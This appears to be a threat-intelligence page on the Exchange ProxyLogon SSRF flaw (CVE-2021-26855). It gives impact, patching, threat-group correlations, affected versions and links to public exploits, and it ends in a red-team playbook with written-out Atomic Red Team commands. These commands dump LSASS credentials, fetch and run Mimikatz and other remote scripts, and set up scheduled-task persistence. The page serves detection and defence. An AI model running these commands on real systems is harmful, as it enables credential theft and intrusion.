CVE-2021-26855
Overview
This vulnerability is a server-side request forgery (SSRF) flaw in Microsoft Exchange Server's HTTP proxy component, specifically affecting the handling of unauthenticated HTTP requests to the /owa/auth/x.js endpoint. The root cause lies in improper validation of backend request headers, allowing crafted headers to manipulate internal server requests. The affected feature is the Exchange Server proxy functionality responsible for routing client requests to internal services, enabling unauthorized request redirection within the server environment.
Vulnerability Description
Microsoft Exchange Server Remote Code Execution Vulnerability
Impact
An unauthenticated attacker can exploit this vulnerability remotely without user interaction to gain unauthorized access to sensitive internal resources and execute arbitrary code on the Exchange Server. This enables full system compromise, including the ability to access mailbox data, manipulate email traffic, and potentially move laterally within the network. The exploit can lead to data breaches, service disruption, and loss of system integrity, severely impacting organizational security and operations.
Solution
Microsoft has released security updates addressing this vulnerability in Exchange Server 2016 Cumulative Update 19 and later. Administrators should apply the updates as detailed in the Microsoft Security Advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855. The advisory provides step-by-step patching instructions and recommends immediate deployment of the cumulative update to affected Exchange Server versions to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
ToddyCat
|
MEDIUM | — | correlation_mitre |
|
APT41
|
MEDIUM | — | correlation_mitre |
|
Threat Group-3390
|
MEDIUM | — | correlation_mitre |
|
Magic Hound
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability exists within Microsoft Exchange Server, specifically affecting various cumulative updates across the 2013, 2016, and 2019 versions. This flaw allows for remote code execution, which can be exploited by an attacker to gain unauthorized access to the server. The vulnerability arises from improper validation of command inputs, enabling malicious actors to execute arbitrary code within the context of the affected application. This can lead to a complete compromise of the server, allowing attackers to manipulate data, install malware, or pivot to other systems within the network.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker can initiate an attack by sending specially crafted requests to the vulnerable Exchange Server. Given that Exchange Server is often exposed to the internet for email services, the attack surface is significantly broadened. Exploitation can occur without any user interaction, making it a prime target for automated attacks. Scenarios may include an attacker gaining access to sensitive corporate emails, stealing credentials, or deploying ransomware, which can have devastating effects on an organization’s operations.
The real-world impact of this vulnerability is profound, as it poses significant business risks. Organizations that rely on Microsoft Exchange for communication are particularly vulnerable, as a successful exploitation could lead to data breaches, loss of sensitive information, and reputational damage. The financial implications can be severe, with potential costs arising from incident response, legal liabilities, and regulatory fines. Furthermore, the disruption of email services can hinder business continuity, leading to lost productivity and revenue. The high CVSS score of 9.1 underscores the critical nature of this vulnerability, indicating that organizations must prioritize its remediation.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching Microsoft Exchange Server installations is essential, as Microsoft has released security updates specifically addressing this flaw. Implementing robust network segmentation can limit the exposure of Exchange Servers to the internet, reducing the attack surface. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activity and anomalous requests that may indicate exploitation attempts. Conducting regular security assessments and penetration testing can also help identify vulnerabilities before they are exploited by malicious actors.
In conclusion, the remote code execution vulnerability in Microsoft Exchange Server represents a significant threat to organizations that utilize this platform for email communication. The potential for exploitation through crafted requests, combined with the severe impact on business operations and data integrity, necessitates immediate attention from cybersecurity professionals. By implementing comprehensive detection and mitigation strategies, organizations can safeguard their systems against this critical vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2021-26855, indicating a modest resurgence in attempts to exploit this critical Microsoft Exchange Server vulnerability. While the overall exploitation trend remains stable, the uptick in detection signals suggests that threat actors, including ransomware-associated groups such as ToddyCat and APT41, continue to leverage this vulnerability as part of their operational toolkits. The persistence of publicly available proof-of-concept exploits, combined with ongoing reconnaissance and scanning efforts observed by our sensors, underscores the sustained interest in this attack vector. This development is significant for defenders as it highlights the enduring risk posed by CVE-2021-26855 despite mitigation efforts and patch availability. Consequently, the threat level remains elevated, warranting continued vigilance and monitoring to detect potential intrusion attempts that could lead to severe operational disruption or ransomware deployment.
Update 2 — June 15, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2021-26855, reflected by a modest uptick in telemetry signals and a corresponding rise in the Exploit Prediction Scoring System (EPSS) score to its maximum value. This subtle escalation indicates that adversaries continue to probe and potentially exploit this vulnerability despite widespread awareness and patch availability. The persistence of publicly accessible proof-of-concept tools, which facilitate mass scanning and exploitation, sustains the attractiveness of this vector for threat actors, including ransomware groups such as ToddyCat and APT41. While the increase is not rapid or dramatic, it underscores the ongoing operational relevance of CVE-2021-26855 in the current threat landscape. Consequently, the threat level remains elevated, emphasizing the necessity for defenders to maintain vigilant monitoring and detection capabilities to identify exploitation attempts that could lead to unauthorized access or ransomware deployment.
Update 3 — July 08, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2021-26855 exploitation attempts, reflecting a modest upward trend in adversary engagement. This subtle rise in telemetry suggests that threat actors, including ransomware-affiliated groups such as ToddyCat and APT41, continue to prioritize this vulnerability as a viable attack vector. The persistence of publicly available proof-of-concept exploits, some recently enhanced with advanced techniques, sustains the operational utility of this vulnerability in the wild. Although the escalation is not pronounced, it reinforces the enduring threat posed by CVE-2021-26855 and underscores the necessity for ongoing vigilance. Consequently, the overall risk posture remains elevated, with the vulnerability continuing to represent a critical entry point for unauthorized access and ransomware deployment within targeted environments.
Affected Products (24)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Exchange Server | 2013 |
cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2013 |
cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_22:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2013 |
cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_10:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_11:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_12:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_13:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_8:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_9:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:-:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_1:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_2:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (3)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Microsoft Exchange ProxyLogon RCE
exploits/windows/http/exchange_proxylogon_rce
|
Orange Tsai, Jang (@testanull), mekhalleh (RAMELLA Sébastien) +4 | Unknown | - | View |
|
Microsoft Exchange ProxyLogon Collector
auxiliary/gather/exchange_proxylogon_collector
|
Orange Tsai, GreyOrder, mekhalleh (RAMELLA Sébastien) | Unknown | - | View |
|
Microsoft Exchange ProxyLogon Scanner
auxiliary/scanner/http/exchange_proxylogon
|
Orange Tsai, mekhalleh (RAMELLA Sébastien) | Unknown | - | View |
ExploitDB (4)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit) | mekhalleh | webapps | windows | - | View |
| Microsoft Exchange 2019 - Unauthenticated Email Download | Gonzalo Villegas | webapps | windows | - | View |
| Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC) | testanull | webapps | windows | - | View |
| Microsoft Exchange 2019 - Server-Side Request Forgery | F5 | remote | windows | - | View |
GitHub PoCs (49)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Flangvik/SharpProxyLogon
C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injec...
|
Flangvik | 249 | 41 | 2021-03-29 | View |
|
hosch3n/ProxyVulns
[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-3119...
|
hosch3n | 177 | 33 | 2021-04-14 | View |
|
dwisiswant0/proxylogscan
A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authenti...
|
dwisiswant0 | 164 | 23 | 2021-03-08 | View |
|
h4x0r-dz/CVE-2021-26855
|
h4x0r-dz | 100 | 61 | 2021-03-09 | View |
|
p0wershe11/ProxyLogon
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)
|
p0wershe11 | 124 | 32 | 2021-03-17 | View |
|
cert-lv/exchange_webshell_detection
Detect webshells dropped on Microsoft Exchange servers exploited through "proxylogon" group of vulnerabilites (CVE-2021-...
|
cert-lv | 99 | 19 | 2021-03-05 | View |
|
hackerschoice/CVE-2021-26855
PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github
|
hackerschoice | 61 | 32 | 2021-03-11 | View |
|
alt3kx/CVE-2021-26855_PoC
|
alt3kx | 53 | 29 | 2021-03-10 | View |
|
hackerxj007/CVE-2021-26855
CVE-2021-26855 exp
|
hackerxj007 | 5 | 69 | 2021-03-08 | View |
|
praetorian-inc/proxylogon-exploit
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
|
praetorian-inc | 52 | 17 | 2021-03-24 | View |
|
ZephrFish/Exch-CVE-2021-26855
CVE-2021-26855: PoC (Not a HoneyPoC for once!)
|
ZephrFish | 30 | 15 | 2021-03-14 | View |
|
conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855
Microsoft Exchange Server SSRF漏洞(CVE-2021-26855)
|
conjojo | 36 | 8 | 2021-03-06 | View |
|
RickGeex/ProxyLogon
ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an ...
|
RickGeex | 33 | 9 | 2021-03-16 | View |
|
evilashz/ExchangeSSRFtoRCEExploit
CVE-2021-26855 & CVE-2021-27065
|
evilashz | 28 | 9 | 2021-03-15 | View |
|
srvaccount/CVE-2021-26855-PoC
PoC exploit code for CVE-2021-26855
|
srvaccount | 17 | 20 | 2021-03-09 | View |
|
pussycat0x/CVE-2021-26855-SSRF
This script helps to identify CVE-2021-26855 ssrf Poc
|
pussycat0x | 23 | 12 | 2021-03-06 | View |
|
hakivvi/proxylogon
RCE exploit for Microsoft Exchange Server (CVE-2021-26855).
|
hakivvi | 22 | 6 | 2021-03-14 | View |
|
soteria-security/HAFNIUM-IOC
A PowerShell script to identify indicators of exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-20...
|
soteria-security | 22 | 1 | 2021-03-03 | View |
|
r0xDB/CVE-2021-26855
CVE-2021-26855, also known as Proxylogon, is a server-side request forgery (SSRF) vulnerability in Exchange that allow...
|
r0xDB | 12 | 7 | 2021-03-11 | View |
|
mil1200/ProxyLogon-CVE-2021-26855
RCE exploit for ProxyLogon vulnerability in Microsoft Exchange
|
mil1200 | 9 | 8 | 2021-03-14 | View |
|
kh4sh3i/ProxyLogon
ProxyLogon (CVE-2021-26855+CVE-2021-27065) Exchange Server RCE (SSRF->GetWebShell)
|
kh4sh3i | 9 | 2 | 2022-06-27 | View |
|
Yt1g3r/CVE-2021-26855_SSRF
POC of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865, ProxyLogon poc
|
Yt1g3r | 4 | 6 | 2021-03-08 | View |
|
Mr-xn/CVE-2021-26855-d
|
Mr-xn | 6 | 4 | 2021-03-15 | View |
|
SCS-Labs/HAFNIUM-Microsoft-Exchange-0day
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065
|
SCS-Labs | 5 | 4 | 2021-03-11 | View |
|
thau0x01/poc_proxylogon
Microsoft Exchange ProxyLogon PoC (CVE-2021-26855)
|
thau0x01 | 8 | 1 | 2021-12-04 | View |
|
sgnls/exchange-0days-202103
IoC determination for exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
|
sgnls | 5 | 3 | 2021-03-03 | View |
|
La3B0z/CVE-2021-26855-SSRF-Exchange
CVE-2021-26855 SSRF Exchange Server
|
La3B0z | 6 | 2 | 2021-03-07 | View |
|
TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit
CVE-2021-26855 proxyLogon metasploit exploit script
|
TaroballzChen | 4 | 4 | 2021-03-17 | View |
|
catmandx/CVE-2021-26855-Exchange-RCE
Microsoft Exchange Proxylogon Exploit Chain EXP分析
|
catmandx | 0 | 6 | 2021-03-21 | View |
|
mekhalleh/exchange_proxylogon
Module pack for #ProxyLogon (part. of my contribute for Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]
|
mekhalleh | 4 | 2 | 2021-03-07 | View |
|
ZephrFish/Exch-CVE-2021-26855_Priv
patched to work
|
ZephrFish | 4 | 1 | 2021-03-15 | View |
|
KotSec/CVE-2021-26855-Scanner
Scanner and PoC for CVE-2021-26855
|
KotSec | 3 | 2 | 2021-03-12 | View |
|
ssrsec/Microsoft-Exchange-RCE
Microsoft Exchange CVE-2021-26855&CVE-2021-27065
|
ssrsec | 3 | 2 | 2023-02-02 | View |
|
Immersive-Labs-Sec/ProxyLogon
Chaining CVE-2021-26855 and CVE-2021-26857 to exploit Microsoft Exchange
|
Immersive-Labs-Sec | 3 | 1 | 2021-03-16 | View |
|
haotiku/CVE-2021-26855-exploit-Exchange
|
haotiku | 0 | 2 | 2021-04-14 | View |
|
glen-pearson/ProxyLogon-CVE-2021-26855
|
glen-pearson | 1 | 1 | 2023-04-23 | View |
|
antichown/Scan-Vuln-CVE-2021-26855
|
antichown | 0 | 1 | 2021-03-18 | View |
|
TheDudeD6/ExchangeSmash
CVE-2021-26855
|
TheDudeD6 | 0 | 1 | 2022-06-24 | View |
|
Wercd/CVE-2021-26855
|
Wercd | 0 | 0 | 2025-12-04 | View |
|
Nick-Yin12/106362522
針對近期微軟公布修補遭駭客攻擊的Exchange Server漏洞問題,台灣DEVCORE表示早在1月5日便已發現安全漏洞後,並且向微軟通報此項編號命名為「CVE-2021-26855 」,以及「CVE-2021-27065」的零日漏洞,同...
|
Nick-Yin12 | 0 | 0 | 2021-04-19 | View |
|
1342486672/Flangvik
C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…
|
1342486672 | 0 | 0 | 2022-06-07 | View |
|
DCScoder/Exchange_IOC_Hunter
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065
|
DCScoder | 0 | 0 | 2021-03-09 | View |
|
SimoesCTT/CTT-ProxyLogon-RCE-v1.0---Convergent-Time-Theory-Enhanced-Microsoft-Exchange-Exploit
An advanced exploit for Microsoft Exchange Server (CVE-2021-26855, CVE-2021-27065) enhanced with Convergent Time Theory...
|
SimoesCTT | 0 | 0 | 2026-01-27 | View |
|
hictf/CVE-2021-26855-CVE-2021-27065
analytics ProxyLogo Mail exchange RCE
|
hictf | 0 | 0 | 2021-03-23 | View |
|
ShyTangerine/cve-2021-26855
|
ShyTangerine | 0 | 0 | 2023-04-25 | View |
|
SimoesCTT/CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065
CTT-enhanced version of the Microsoft Exchange Server SSRF to RCE exploit (ProxyShell/ProxyLogon), another CVSS 10.0 cri...
|
SimoesCTT | 0 | 0 | 2026-01-28 | View |
|
mauricelambert/ExchangeWeaknessTest
This script test the CVE-2021-26855 vulnerability on Exchange Server.
|
mauricelambert | 0 | 0 | 2021-03-09 | View |
|
timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt
Clone from gist
|
timb-machine-mirrors | 0 | 0 | 2024-01-04 | View |
|
yaoxiaoangry3/Flangvik
C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…
|
yaoxiaoangry3 | 0 | 0 | 2021-10-30 | View |
Ransomware Groups 4
Threat Feed
53 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
30%
|
High | High |
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 